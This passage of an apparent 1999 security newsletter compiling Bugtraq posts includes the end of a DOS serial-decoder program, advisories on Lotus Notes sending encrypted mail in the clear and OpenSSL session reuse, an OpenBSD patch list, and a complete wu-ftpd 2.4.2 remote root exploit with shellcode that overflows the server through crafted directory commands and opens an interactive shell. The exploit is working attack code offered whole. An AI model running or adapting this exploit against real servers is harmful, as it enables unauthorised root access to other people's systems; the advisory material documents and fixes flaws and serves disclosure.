  4704.          if (argc > 1)
  4705.          {
  4706.            printf ("Reverse Polarity.\n");
  4707.            cw1 = 48;
  4708.            cw0 = 49;
  4709.          }
  4710.        
  4711.          /* dt is the number of expected clock ticks per bit */
  4712.          dt =  1.0/(4800.0*838.8e-9);
  4713.        
  4714.          oldfuncc = getvect(0x0c);    /* save COM1 Vector                    */
  4715.          setvect (0x0c, com1int);     /* Capture COM1 vector                 */
  4716.        
  4717.        
  4718.          n = inportb (0x21);          /* enable IRQ4 interrupt               */
  4719.          outportb(0x21, n & 0xef);
  4720.        
  4721.          set8253();                   /* set up 8253 timer chip              */
  4722.        
  4723.          set8250();                   /* set up 8250 UART                    */
  4724.        
  4725.          while ((kbhit() == 0) && (fobp<29900))
  4726.          {
  4727.           if (i != cpstn)
  4728.           {
  4729.            if  ( ( fdata[i] & 0x8000) != 0) s = cw1; else s = cw0;
  4730.        
  4731.            /* add in new number of cycles to clock  */
  4732.            clk += (fdata[i] & 0x7fff);
  4733.            xct = exc + 0.5 * dt;  /* exc is current boundary */
  4734.            while ( clk >= xct )
  4735.            {
  4736.              frame_sync(s);
  4737.              clk = clk - dt;
  4738.            }
  4739.            /* clk now holds new boundary position. update exc slowly... */
  4740.            /* 0.005 sucks; 0.02 better; 0.06 mayber even better; 0.05 seems pretty
  4741.        good */
  4742.            exc = exc + 0.020*(clk - exc);
  4743.        
  4744.            i++;
  4745.            if( i >buflen) i = 0;
  4746.           }
  4747.        
  4748.          }
  4749.        
  4750.          outportb (0x21, n);          /* disable IRQ4 interrupt              */
  4751.          setvect (0x0c, oldfuncc);    /* restore old COM1 Vector             */
  4752.        
  4753.        
  4754.          /* save captured data to disk file    */
  4755.          i = 0;
  4756.          out = fopen("data.dat","wt");
  4757.          if (out == NULL)
  4758.          {
  4759.            printf ("couldn't open output file.\n");
  4760.            exit(1);
  4761.          }
  4762.        
  4763.          i = 0;
  4764.          while ( (i < fobp) && (i < 29800))
  4765.          {
  4766.            j = ((int)fob[i] & 0xff);
  4767.            i++;
  4768.            for (k=0; k<j; k++)
  4769.            {
  4770.              for (l=0; l<18; l++)
  4771.              {
  4772.                fprintf(out,"%02X ",((int) fob[i + l]&0xff));
  4773.              }
  4774.              fprintf(out,"    ");
  4775.              for (l=0; l<18; l++)
  4776.              {
  4777.                n = ((int)fob[i]&0xff);
  4778.                i++;
  4779.                if (n >=32) fprintf(out,"%c",n); else fprintf(out,".");
  4780.              }
  4781.              fprintf(out,"\n");
  4782.            }
  4783.            fprintf(out,"\n");
  4784.          }
  4785.          fclose(out);
  4786.        }
  4787.  
  4788.  
  4789.      
  4790.       @HWA
  4791.       
  4792.  30.0  Bugtraq: Lotus Notes security advisory
  4793.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4794.        To: BUGTRAQ@netspace.org 
  4795.         
  4796.        
  4797.        
  4798.                   Security advisory
  4799.        
  4800.        
  4801.                   Advisory released Mar 23 1999
  4802.        
  4803.        
  4804.                  -----
  4805.        
  4806.        
  4807.                     Application: Lotus Notes Client (Version 4.5, probably others)
  4808.        
  4809.        
  4810.                          Impact: Encrypted mail sent from the Notes client may
  4811.                   traverse the network in the clear and may be stored
  4812.                   on the mail server unencrypted.
  4813.        
  4814.        
  4815.                          Author: Martin Bartosch
  4816.        
  4817.        
  4818.                  -----
  4819.        
  4820.        
  4821.        
  4822.        Synopsis
  4823.        --------
  4824.        
  4825.        
  4826.        When performing network analysis experiments with the Lotus Notes Client
  4827.        a very subtle bug was discovered that may lead to inadvertent revelation of
  4828.        confidential information.
  4829.        
  4830.        
  4831.        Usually the Notes client sends at least two copies of a newly created mail.
  4832.        One copy is sent to the recipient, the other is stored in the "Sent Mail"
  4833.        folder of the sender's Notes server.
  4834.        
  4835.        
  4836.        If an encrypted mail is to be sent and the conditions for this bug are
  4837.        met, the copy for the sender's "Sent Mail" folder is not encrypted. As a
  4838.        result, the message is sent to the Notes server in the clear and stored
  4839.        on the Notes server unencrypted.
  4840.        
  4841.        
  4842.        The message may thus be intercepted and read by analyzing the network
  4843.        traffic between the sender's Notes client and the server or by directly
  4844.        accessing the "Sent Mail" folder on the Notes server.
  4845.        
  4846.        
  4847.        The user is not given any warning or notification about the problem, and
  4848.        the problem causes almost no noticable side effects. As a result, if a
  4849.        user is affected by the problem, this will probably remain unnoticed.
  4850.        
  4851.        
  4852.        Lotus is currently working on the problem, a detailed analysis and official
  4853.        fixes may be available soon. Once this is available, it should be preferred
  4854.        to the workaround presented in this document.
  4855.        
  4856.        
  4857.        
  4858.        Details
  4859.        -------
  4860.        
  4861.        
  4862.        The problem seems to result from an inadequate check condition in the
  4863.        client code.
  4864.        
  4865.        
  4866.        Traditionally Windows, DOS and OS/2 use the backslash character ('\') as
  4867.        a path separator, whereas Unix systems use the slash ('/') for this
  4868.        purpose. Applications that deal with both styles need to be aware of the
  4869.        problem and have to take care of paths passed to applications or services
  4870.        on other systems.
  4871.        
  4872.        
  4873.        The user's database usually is located on a remote server. Though Notes
  4874.        clients are normally Windows style systems, the servers may either run
  4875.        Windows, OS/2 or Unix as the server operating system. Thus Notes needs to
  4876.        take care of proper translation of file paths as files are accessed on
  4877.        various platforms.
  4878.        
  4879.        
  4880.        Notes accesses databases by specifying the server and the path to
  4881.        the database. In order to open a user's database in the first place, the
  4882.        user needs to enter the correct path to the database or traverse the
  4883.        directory tree on the server. When the database has been opened, Notes
  4884.        remembers the path to the database for subsequent access to this database.
  4885.        
  4886.        
  4887.        Internally the Notes client seems to store the path to the database using
  4888.        the client operating system file naming conventions. In particular, on
  4889.        Windows or OS/2 platforms, Notes uses Backslash characters ('\') as path
  4890.        separators.
  4891.        
  4892.        
  4893.        The current Notes environment settings may be changed by opening the
  4894.        environment document (File/Mobile/Edit current environment). In the second
  4895.        entry of the section "Mail" the path to the mail file can be changed by
  4896.        the user.
  4897.        
  4898.        
  4899.        Notes uses this entry for various purposes. One of these is the periodical
  4900.        check for new mail or agenda events. (If the user specifies an incorrect
  4901.        path here, mail notification does not work any longer.)
  4902.        
  4903.        
  4904.        To address the backslash-slash problem, Notes seems to translate
  4905.        any path entered by the user into the proper representation needed for
  4906.        accessing the service required. Apparently it does not matter at all if
  4907.        paths are entered with slashes or backslashes as path separators. The GUI
  4908.        dialogs accept any spelling as well as the environment document mentioned
  4909.        above.
  4910.        
  4911.        
  4912.        However, if for some reason the environment document of a Windows style
  4913.        client specifies the mail file with *slashes* as a path separator (like
  4914.        e. g. mail/users/user.nsf instead of mail\users\user.nsf) Notes does
  4915.        a proper translation of the path and almost all functions will work as
  4916.        expected.
  4917.        
  4918.        
  4919.        Except for one side effect: Notes does not recognize the specified
  4920.        database as the user's mail database. Probably a simple string compare
  4921.        between the currently opened mail database and the database path of the
  4922.        environment document is performed, and this comparison fails because of
  4923.        the different representation of paths.
  4924.        
  4925.        
  4926.        The resulting effect: if an encrypted mail is to be sent and the
  4927.        environment document does contain a mail database path with 'incorrect'
  4928.        path separators as seen from the client OS view, the mail copy for the
  4929.        user's "Sent Mail" folder is being sent to the user's database in the
  4930.        plain and stored unencrypted on the server. The contents of the message
  4931.        may be read in plain text by sniffing on the network or by directly
  4932.        accessing the notes database.
  4933.        
  4934.        
  4935.        The behaviour described can be reproduced with almost any Notes client
  4936.        and server combination. Even if both the server and client use the
  4937.        same operating system, it is still possible to enter the mail path
  4938.        separated with slash characters. The Notes client will behave as described
  4939.        above.
  4940.        
  4941.        
  4942.        
  4943.        Detection
  4944.        ---------
  4945.        
  4946.        
  4947.        - compose a new mail message
  4948.        - address this message to some other user
  4949.        - using the mail properties dialog enable encryption for this individual
  4950.          message
  4951.        - send message
  4952.        - change to the "Sent Mail" folder of your mail database
  4953.        - right-click on the sent message once
  4954.        - open the properties dialog for this document
  4955.        - choose "fields" in the document properties
  4956.        - check existence of the fields "$Seal", "$SealData" and "Body"
  4957.        
  4958.        
  4959.        Under normal circumstances the "$Seal"/"$SealData" and "Body" fields are
  4960.        mutually exclusive.
  4961.        
  4962.        
  4963.        The existence of "$Seal" and "$SealData" usually indicate that the message
  4964.        was properly encrypted.
  4965.        
  4966.        
  4967.        If the field "Body" exists, this message is stored in the plain on the
  4968.        server and was transferred unencrypted across the network.
  4969.        
  4970.        
  4971.        
  4972.        Alternatively the network traffic can be analyzed while sending an
  4973.        encrypted mail. This is how the bug was discovered in the first place.
  4974.        
  4975.        
  4976.        
  4977.        Workaround
  4978.        ----------
  4979.        
  4980.        
  4981.        The workaround described here may be an incomplete fix for the problem;
  4982.        the problem may be triggered by other conditions as well. As Lotus is
  4983.        actively investigating on the problem, the solution presented by Lotus
  4984.        may be more general and should be preferred once it is available.
  4985.        
  4986.        
  4987.        
  4988.        First method:
  4989.        
  4990.        
  4991.        Open your environment document. The path to the database must *not*
  4992.        contain any path separator characters that are not natively used by
  4993.        the client operating system.
  4994.        
  4995.        
  4996.        When using a Windows or OS/2 environment, the path must only contain
  4997.        backslash '\' characters.
  4998.        
  4999.        
  5000.        
  5001.        Example:
  5002.        
  5003.        
  5004.        Mail File: mail\path\to\user.nsf    * OK *
  5005.        
  5006.        
  5007.        Mail File: mail/path/to/user.nsf    * DANGER! *
  5008.        
  5009.        
  5010.        A client restart is required to make the changes effective.
  5011.        
  5012.        
  5013.        
  5014.        Second method:
  5015.        
  5016.        
  5017.        In your global preferences check the "Encrypt saved mail" box. Every
  5018.        message you send will be encrypted when saving the message to the "Sent
  5019.        Mail" folder on the server.
  5020.        
  5021.        
  5022.        
  5023.        Use both methods to be sure that mail sent by the client is not sent and
  5024.        stored in the clear. Be aware that using the second methond will
  5025.        result in encryption of the whole database and that loss of your
  5026.        passphrase or Notes ID will effectively cause loss of your mail database
  5027.        contents.
  5028.        
  5029.        
  5030.        
  5031.        
  5032.        Vendor activities
  5033.        -----------------
  5034.        
  5035.        
  5036.        Lotus has been informed of this bug and is currently working on the problem.
  5037.        An official fix or workaround will be published by Lotus.
  5038.        
  5039.        
  5040.        
  5041.        
  5042.        Credits
  5043.        -------
  5044.        
  5045.        
  5046.        Michael Doberenz; Michael Popp
  5047.          whose network analysis experiments revealed that there was a problem
  5048.          in the first place
  5049.        
  5050.        
  5051.        Artur Hahn
  5052.          found the real reason (path separator issue) for the Notes encryption
  5053.          problem
  5054.        
  5055.        
  5056.        
  5057.        
  5058.        
  5059.        
  5060.        --
  5061.        Martin Bartosch                                       bartosch@mail.deuba.com
  5062.        
  5063.        
  5064.        This message and any statements expressed therein are those of myself
  5065.        and not of the Deutsche Bank AG or its subsidiary companies.
  5066.  
  5067.        @HWA
  5068.  
  5069.  31.0  Bugtraq: New FTP exploit     
  5070.        ~~~~~~~~~~~~~~~~~~~~~~~~
  5071.        
  5072.        Approved-By: aleph1@UNDERGROUND.ORG 
  5073.        Received: from smtp3.xs4all.nl (smtp3.xs4all.nl [194.109.6.53]) by netspace.org 
  5074.                  (8.8.7/8.8.7) with ESMTP id LAA25208 for <BUGTRAQ@netspace.org>; Mon, 
  5075.                  22 Mar 1999 11:10:17 -0500 
  5076.        Received: from xs3.xs4all.nl (pietern@xs3.xs4all.nl [194.109.6.44]) by 
  5077.                  smtp3.xs4all.nl (8.8.8/8.8.8) with ESMTP id RAA03847 for 
  5078.                  <BUGTRAQ@netspace.org>; Mon, 22 Mar 1999 17:10:23 +0100 (CET) 
  5079.        Received: from localhost (pietern@localhost) by xs3.xs4all.nl (8.9.0/8.9.0) 
  5080.                  with ESMTP id RAA18937 for <BUGTRAQ@netspace.org>; Mon, 22 Mar 1999 
  5081.                  17:10:23 +0100 (CET) 
  5082.        MIME-Version: 1.0 
  5083.        Content-Type: TEXT/PLAIN; charset=US-ASCII 
  5084.        Message-ID: <Pine.BSI.4.10.9903221702080.18430-100000@xs3.xs4all.nl> 
  5085.        Date:   Mon, 22 Mar 1999 17:10:23 +0100 
  5086.        Reply-To: Pieter Nieuwenhuijsen <pietern@XS4ALL.NL> 
  5087.        Sender: Bugtraq List <BUGTRAQ@netspace.org> 
  5088.        From: Pieter Nieuwenhuijsen <pietern@XS4ALL.NL> 
  5089.        Subject:      ftp exploit 
  5090.        To: BUGTRAQ@netspace.org 
  5091.        
  5092.        
  5093.        /*
  5094.                THIS IS PRIVATE! DO NOT DISTRIBUTE!!!!   PRIVATE!
  5095.        
  5096.        
  5097.                WU-FTPD REMOTE EXPLOIT Version wu-2.4.2-academ[BETA-18](1)
  5098.                for linux x86 (redhat 5.2)
  5099.        
  5100.        
  5101.                by duke
  5102.                duke@viper.net.au
  5103.        
  5104.        
  5105.                BIG thanks to stran9er for alot of help with part of the shellcode!
  5106.                i fear stran9er, but who doesn't? !@$ :)
  5107.        
  5108.        
  5109.                Greets to: #!ADM, el8.org users,
  5110.        
  5111.        
  5112.                To exploit this remotely they need to have a directory you can
  5113.                have write privlidges to.. this is the <dir> argument.. you can
  5114.                also use this locally by specifying -l <ur login> -p <urpass> with the
  5115.                <dir> = your home directory or something..(must begin with '/')
  5116.                also alignment arg is how return address  is aligned.. shouldnt need it,
  5117.                but if u do it should be between 0 and 3
  5118.        
  5119.        
  5120.                It takes about 10 seconds after "logged in" so be patient.
  5121.                -duke
  5122.        */
  5123.        
  5124.        
  5125.        #include <stdio.h>
  5126.        #include <string.h>
  5127.        #include <netdb.h>
  5128.        #include <netinet/in.h>
  5129.        #include <sys/socket.h>
  5130.        #include <sys/types.h>
  5131.        //#include <linux/time.h>
  5132.        //#include <sys/select.h>
  5133.        #include <sys/time.h>
  5134.        #include <unistd.h>
  5135.        
  5136.        
  5137.        #define RET 0xbfffa80f
  5138.        
  5139.        
  5140.        void logintoftp();
  5141.        void sh();
  5142.        void mkd(char *);
  5143.        int max(int, int);
  5144.        long getip(char *name);
  5145.        
  5146.        
  5147.        char shellcode[] =
  5148.        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x17\xcd\x80"
  5149.        "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80"
  5150.        "\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0\x27\x8d\x5e\x05\xfe\xc5\xb1\xed"
  5151.        "\xcd\x80\x31\xc0\x8d\x5e\x05\xb0\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1"
  5152.        "\xd0\xff\xf7\xdb\x31\xc9\xb1\x10\x56\x01\xce\x89\x1e\x83\xc6\x03"
  5153.        "\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10\xcd\x80\x31\xc0\x88\x46\x07\x89"
  5154.        "\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd"
  5155.        "\x80\xe8\xac\xff\xff\xff";
  5156.        
  5157.        
  5158.        char tmp[256];
  5159.        char name[128], pass[128];
  5160.        
  5161.        
  5162.        int sockfd;
  5163.        
  5164.        
  5165.        int main(int argc, char **argv)
  5166.        {
  5167.                char sendln[1024], recvln[4048], buf1[800], buf2[1000];
  5168.                char *p, *q, arg, **fakeargv = (char **) malloc(sizeof(char *)*(argc + 1));
  5169.                int len, offset = 0, i, align=0;
  5170.                struct sockaddr_in cli;
  5171.        
  5172.        
  5173.                if(argc < 3){
  5174.                        printf("usage: %s <host> <dir> [-l name] [-p pass] [-a <alignment>] [-o offset]\n", argv[0]);
  5175.                        exit(0);
  5176.                }
  5177.        
  5178.        
  5179.                for(i=0; i < argc; i++) {
  5180.                  fakeargv[i] = (char *)malloc(strlen(argv[i]) + 1);
  5181.                  strncpy(fakeargv[i], argv[i], strlen(argv[i]) + 1);
  5182.                }
  5183.        
  5184.        
  5185.                fakeargv[argc] = NULL;
  5186.        
  5187.        
  5188.        
  5189.                while((arg = getopt(argc,fakeargv,"l:p:a:o:")) != EOF){
  5190.                    switch(arg) {
  5191.                          case 'l':
  5192.                             strncpy(name,optarg,128);
  5193.                             break;
  5194.                          case 'p':
  5195.                             strncpy(pass,optarg,128);
  5196.                             break;
  5197.                          case 'a':
  5198.                             align=atoi(optarg);
  5199.                             break;
  5200.                          case 'o':
  5201.                             offset=atoi(optarg);
  5202.                             break;
  5203.                          default:
  5204.                             printf("usage: %s <host> <dir> [-l name] [-p pass] [-a <alignment>] [-o offset]\n", argv[0]);
  5205.                             exit(0);
  5206.                             break;
  5207.                     }
  5208.                }
  5209.        
  5210.        
  5211.                if(name[0] == 0) strcpy(name, "anonymous");
  5212.                if(pass[0] == 0) strcpy(pass, "hi@blahblah.net");
  5213.        
  5214.        
  5215.        
  5216.                bzero(&cli, sizeof(cli));
  5217.                bzero(recvln, sizeof(recvln));
  5218.                bzero(sendln, sizeof(sendln));
  5219.                cli.sin_family = AF_INET;
  5220.                cli.sin_port = htons(21);
  5221.                cli.sin_addr.s_addr=getip(argv[1]);
  5222.        
  5223.        
  5224.                if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
  5225.                        perror("socket");
  5226.                        exit(0);
  5227.                }
  5228.        
  5229.        
  5230.                if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
  5231.                        perror("connect");
  5232.                        exit(0);
  5233.                }
  5234.                while((len = read(sockfd, recvln, sizeof(recvln))) > 0){
  5235.                        recvln[len] = '\0';
  5236.                        if(strchr(recvln, '\n') != NULL)
  5237.                                break;
  5238.                }
  5239.                logintoftp(sockfd);
  5240.                printf("logged in.\n");
  5241.                bzero(sendln, sizeof(sendln));
  5242.        
  5243.        
  5244.                for(i=align; i<996; i+=4)
  5245.                        *(long *)&buf2[i] = RET + offset;
  5246.                memcpy(buf2, "a", align);
  5247.                memset(buf1, 0x90, 800);
  5248.                memcpy(buf1, argv[2], strlen(argv[2]));
  5249.                mkd(argv[2]);
  5250.                p = &buf1[strlen(argv[2])];
  5251.                q = &buf1[799];
  5252.                *q = '\x0';
  5253.                while(p <= q){
  5254.                        strncpy(tmp, p, 200);
  5255.                        mkd(tmp);
  5256.                        p+=200;
  5257.                }
  5258.                mkd(shellcode);
  5259.                mkd("bin");
  5260.                mkd("sh");
  5261.                p = &buf2[0];
  5262.                q = &buf2[999];
  5263.                while(p <= q){
  5264.                        strncpy(tmp, p, 250);
  5265.                        mkd(tmp);
  5266.                        p+=250;
  5267.                }
  5268.                sh(sockfd);
  5269.        
  5270.        
  5271.        
  5272.                close(sockfd);
  5273.                printf("finit.\n");
  5274.        }
  5275.        
  5276.        
  5277.        void mkd(char *dir)
  5278.        {
  5279.                char snd[512], rcv[1024];
  5280.                char blah[1024], *p;
  5281.                int n;
  5282.                struct timeval tv;
  5283.        
  5284.        
  5285.                fd_set fds;
  5286.                bzero(&tv, sizeof(tv));
  5287.                tv.tv_usec=50;
  5288.                bzero(blah, sizeof(blah));
  5289.                p = blah;
  5290.                 for(n=0; n<strlen(dir); n++){
  5291.                        if(dir[n] == '\xff'){
  5292.                                *p = '\xff';
  5293.                                p++;
  5294.                        }
  5295.                        *p = dir[n];
  5296.                        p++;
  5297.                }
  5298.                sprintf(snd, "MKD %s\r\n", blah);
  5299.                write(sockfd, snd, strlen(snd));
  5300.                bzero(snd, sizeof(snd));
  5301.                sprintf(snd, "CWD %s\r\n", blah);
  5302.                write(sockfd, snd, strlen(snd));
  5303.                bzero(rcv, sizeof(rcv));
  5304.        
  5305.        
  5306.                FD_ZERO(&fds);
  5307.                FD_SET(sockfd,&fds);
  5308.                select(sockfd+1,&fds,NULL,NULL,&tv);
  5309.        
  5310.        
  5311.                if (FD_ISSET(sockfd,&fds))
  5312.                        while((n = read(sockfd, rcv, sizeof(rcv))) > 0){
  5313.                                rcv[n] = 0;
  5314.                                if(strchr(rcv, '\n') != NULL)
  5315.                                        break;
  5316.                        }
  5317.                return;
  5318.        }
  5319.        
  5320.        
  5321.        void logintoftp()
  5322.        {
  5323.                char snd[1024], rcv[1024];
  5324.                int n;
  5325.        
  5326.        
  5327.                printf("logging in with %s: %s\n", name, pass);
  5328.                memset(snd, '\0', 1024);
  5329.                sprintf(snd, "USER %s\r\n", name);
  5330.                write(sockfd, snd, strlen(snd));
  5331.        
  5332.        
  5333.                while((n=read(sockfd, rcv, sizeof(rcv))) > 0){
  5334.                        rcv[n] = 0;
  5335.                        if(strchr(rcv, '\n') != NULL)
  5336.                                break;
  5337.                }
  5338.        
  5339.        
  5340.                memset(snd, '\0', 1024);
  5341.                sprintf(snd, "PASS %s\r\n", pass);
  5342.                write(sockfd, snd, strlen(snd));
  5343.        
  5344.        
  5345.                while((n=read(sockfd, rcv, sizeof(rcv))) > 0){
  5346.                        rcv[n] = 0;
  5347.                        if(strchr(rcv, '\n') != NULL)
  5348.                                break;
  5349.                }
  5350.                return;
  5351.        }
  5352.        
  5353.        
  5354.        void sh()
  5355.        {
  5356.                char snd[1024], rcv[1024];
  5357.                fd_set rset;
  5358.                int maxfd, n;
  5359.        
  5360.        
  5361.                strcpy(snd, "cd /; uname -a; pwd; id;\n");
  5362.                write(sockfd, snd, strlen(snd));
  5363.        
  5364.        
  5365.                for(;;){
  5366.                        FD_SET(fileno(stdin), &rset);
  5367.                        FD_SET(sockfd, &rset);
  5368.                        maxfd = max(fileno(stdin), sockfd) + 1;
  5369.                        select(maxfd, &rset, NULL, NULL, NULL);
  5370.                        if(FD_ISSET(fileno(stdin), &rset)){
  5371.                                bzero(snd, sizeof(snd));
  5372.                                fgets(snd, sizeof(snd)-2, stdin);
  5373.                                write(sockfd, snd, strlen(snd));
  5374.                        }
  5375.                        if(FD_ISSET(sockfd, &rset)){
  5376.                                bzero(rcv, sizeof(rcv));
  5377.                                if((n = read(sockfd, rcv, sizeof(rcv))) == 0){
  5378.                                        printf("EOF.\n");
  5379.                                        exit(0);
  5380.                                }
  5381.                                if(n < 0){
  5382.                                        perror("read");
  5383.                                        exit(-1);
  5384.                                }
  5385.                                fputs(rcv, stdout);
  5386.                        }
  5387.                }
  5388.        }
  5389.        
  5390.        
  5391.        int max(int x, int y)
  5392.        {
  5393.                if(x > y)
  5394.                        return(x);
  5395.                return(y);
  5396.        }
  5397.        
  5398.        
  5399.        long getip(char *name)
  5400.        {
  5401.                struct hostent *hp;
  5402.                long ip;
  5403.        
  5404.        
  5405.                if ((ip=inet_addr(name))==-1)
  5406.                {
  5407.                        if ((hp=gethostbyname(name))==NULL)
  5408.                        {
  5409.                                fprintf(stderr,"Can't resolve host.\n");
  5410.                                exit (1);
  5411.                        }
  5412.                        memcpy(&ip, (hp->h_addr), 4);
  5413.                }
  5414.                return ip;
  5415.        }
  5416.  
  5417.        @HWA
  5418.        
  5419.  32.0  Bugtraq: OpenSSL and SSLeay Advisory
  5420.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5421.        
  5422.        
  5423.        OpenSSL and SSLeay Security Alert
  5424.                   ---------------------------------
  5425.  
  5426.  
  5427.        
  5428.        It was recently realised that packages that use SSLeay and OpenSSL may
  5429.        suffer from a security problem: under some circumstances, SSL sessions
  5430.        can be reused in a different context from their original one. This may
  5431.        allow access controls based on client certificates to be bypassed.
  5432.        
  5433.        
  5434.        Unfortunately, before the the problem was fully understood, it was
  5435.        discussed on various public lists. The OpenSSL team have therefore
  5436.        decided to release an interim version of OpenSSL which addresses the
  5437.        problem by disabling session reuse except in limited circumstances
  5438.        (see below).
  5439.        
  5440.        
  5441.        A future version will deal with the problem more elegantly by redoing
  5442.        verification on reused sessions when necessary.
  5443.        
  5444.        
  5445.        Although this problem is not strictly a defect in OpenSSL, it is
  5446.        rather tricky for applications to be coded correctly to avoid the
  5447.        problem due to the sketchy nature of SSLeay/OpenSSL documentation. We
  5448.        therefore decided to protect applications from within OpenSSL.
  5449.        
  5450.        
  5451.        
  5452.        The problem
  5453.        -----------
  5454.        
  5455.        
  5456.        SSL sessions include a session ID which allows initial setup to be
  5457.        bypassed once a session has been established between a client and
  5458.        server. This session ID, when presented by the client, causes the same
  5459.        master key to be used as was used on the previous connection, thus
  5460.        saving considerable session setup time.
  5461.        
  5462.        
  5463.        When the session is reused in this manner, all access controls based
  5464.        on client certificates are bypassed, on the grounds that the original
  5465.        session would have made the necessary checks.
  5466.        
  5467.        
  5468.        Unfortunately, the lack of documentation has resulted in the caching
  5469.        structures being used in certain applications without appropriate care
  5470.        being taken to assure that the cached sessions are only available at
  5471.        the appropriate moments.
  5472.        
  5473.        
  5474.        As a result it is sometimes possible for a specially written SSL
  5475.        client to fraudulently obtain an SSL connection which requires access
  5476.        control by reusing a previous session which had different or no access
  5477.        control.
  5478.        
  5479.        
  5480.        The problem affects servers which support session reuse and which have
  5481.        multiple virtual hosts served from a single server, where some virtual
  5482.        hosts use differing client server verifications. Note that "different"
  5483.        includes no verification on some hosts, and verification on others, or
  5484.        different CAs for different hosts.
  5485.        
  5486.        
  5487.        In order to exploit this problem carefully written client software
  5488.        would need to be written. The attacker would need considerable
  5489.        knowledge of the SSL protocol. Standard web browsers will not and
  5490.        cannot be made to use SSL in this way.
  5491.        
  5492.        
  5493.        
  5494.        Affected software
  5495.        -----------------
  5496.        
  5497.        
  5498.        All server software using SSLeay or versions of OpenSSL prior to
  5499.        version 0.9.2b that support multiple virtual hosts with different
  5500.        client certificate verification may be vulnerable.
  5501.        
  5502.        
  5503.        This includes, but is not limited to:
  5504.        
  5505.        
  5506.        Apache-SSL      http://www.apache-ssl.org/
  5507.        mod_ssl         http://www.engelschall.com/sw/mod_ssl/
  5508.        Raven           http://www.covalent.net/
  5509.        Stronghold      http://www.c2.net/
  5510.        
  5511.        
  5512.        
  5513.        The solution
  5514.        ------------
  5515.        
  5516.        
  5517.        Download OpenSSL 0.9.2b (see http://www.openssl.org) and build it in
  5518.        the usual way.
  5519.        
  5520.        
  5521.        Check the application for updates, and download those, too (NB: this
  5522.        step is not necessarily required, the updated library will fix the
  5523.        problem). The versions of the applications listed above that you should
  5524.        use are:
  5525.        
  5526.        
  5527.        Apache_SSL 1.3.4+1.32
  5528.        mod_ssl 2.2.6-1.3.4
  5529.        Raven 1.4.0
  5530.        Stronghold 2.4.2
  5531.        
  5532.        
  5533.        Rebuild the application (if needed).
  5534.        
  5535.        
  5536.        If you are an application author, you should look in to the use of
  5537.        SSL_set_session_id_context(), which can be used to reenable session
  5538.        reuse when appropriate.
  5539.        
  5540.        
  5541.        
  5542.        Known exploits
  5543.        --------------
  5544.        
  5545.        
  5546.        There are no known exploits of this security hole.
  5547.        
  5548.        
  5549.        
  5550.        
  5551.        Ben Laurie, for the OpenSSL team.
  5552.        
  5553.        
  5554.        --
  5555.        http://www.apache-ssl.org/ben.html
  5556.        
  5557.        
  5558.        "My grandfather once told me that there are two kinds of people: those
  5559.        who work and those who take the credit. He told me to try to be in the
  5560.        first group; there was less competition there."
  5561.             - Indira Gandhi
  5562.               
  5563.        @HWA
  5564.        
  5565.  33.0  Recent OpenBSD security advisories
  5566.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~           
  5567.        http://www.openbsd.org/security.html#24
  5568.        
  5569.        
  5570.        Approved-By: aleph1@UNDERGROUND.ORG 
  5571.        Received: from cvs.openbsd.org (root@cvs.openbsd.org [199.185.137.3]) by 
  5572.                  netspace.org (8.8.7/8.8.7) with ESMTP id PAA26180 for 
  5573.                  <BUGTRAQ@netspace.org>; Tue, 2 Mar 1999 15:08:12 -0500 
  5574.        Received: from cvs.openbsd.org (IDENT:deraadt@localhost [127.0.0.1]) by 
  5575.                  cvs.openbsd.org (8.9.3/8.9.1) with ESMTP id NAA19006 for 
  5576.                  <BUGTRAQ@netspace.org>; Tue, 2 Mar 1999 13:08:25 -0700 (MST) 
  5577.        Message-ID: <199903022008.NAA19006@cvs.openbsd.org> 
  5578.        Date:   Tue, 2 Mar 1999 13:08:22 -0700 
  5579.        Reply-To: Theo de Raadt <deraadt@CVS.OPENBSD.ORG> 
  5580.        Sender: Bugtraq List <BUGTRAQ@netspace.org> 
  5581.        From: Theo de Raadt <deraadt@CVS.OPENBSD.ORG> 
  5582.        Subject:      New OpenBSD security-related patches 
  5583.        To: BUGTRAQ@netspace.org 
  5584.        
  5585.        
  5586.        There are a couple of new OpenBSD 2.4 security-related patches at
  5587.        
  5588.        
  5589.            http://www.openbsd.org/security.html#24
  5590.        
  5591.        
  5592.        We do not normally publish long wordy advisories to mailing lists (not
  5593.        enough time in the day).  That said, I'm surprised that other readers
  5594.        of BUGTRAQ don't advise each other (publically) when new entries show
  5595.        up in our patches archive.
  5596.        
  5597.        
  5598.        I'm sure some of these fixes affect other systems..
  5599.        
  5600.        -=-
  5601.               "If we are so much greater than the sum of all our parts
  5602.                       how come we're 90% water?" 
  5603.                                                        - Ed
  5604.  
  5605.  
  5606.                                                                         -=-
  5607.        From the site:
  5608.        
  5609.        OpenBSD 2.4 Security Advisories
  5610.  
  5611.        These are the OpenBSD 2.4 advisories -- all these problems are solved in OpenBSD current. Obviously, all the OpenBSD 2.3 advisories listed below are fixed in
  5612.        OpenBSD 2.4. 
  5613.        
  5614.             Mar 22, 1999: The nfds argument for poll(2) needs to be constrained, to avoid kvm starvation (patch included). 
  5615.             Mar 21, 1999: A change in TSS handling stops another kernel crash case caused by the crashme program (patch included). 
  5616.             Feb 25, 1999: An unbounded increment on the nlink value in FFS and EXT2FS filesystems can cause a system crash. (patch included). 
  5617.             Feb 23, 1999: Yet another buffer overflow existed in ping(8). (patch included). 
  5618.             Feb 19, 1999: ipintr() had a race in use of the ipq, which could permit an attacker to cause a crash. (patch included). 
  5619.             Feb 17, 1999: A race condition in the kernel between accept(2) and select(2) could permit an attacker to hang sockets from remote. (patch included). 
  5620.             Feb 17, 1999: IP fragment assembly can bog the machine excessively and cause problems. (patch included). 
  5621.             Feb 12, 1999: i386 T_TRCTRAP handling and DDB interacted to possibly cause a crash. (patch included). 
  5622.             Feb 11, 1999: TCP/IP RST handling was sloppy. (patch included). 
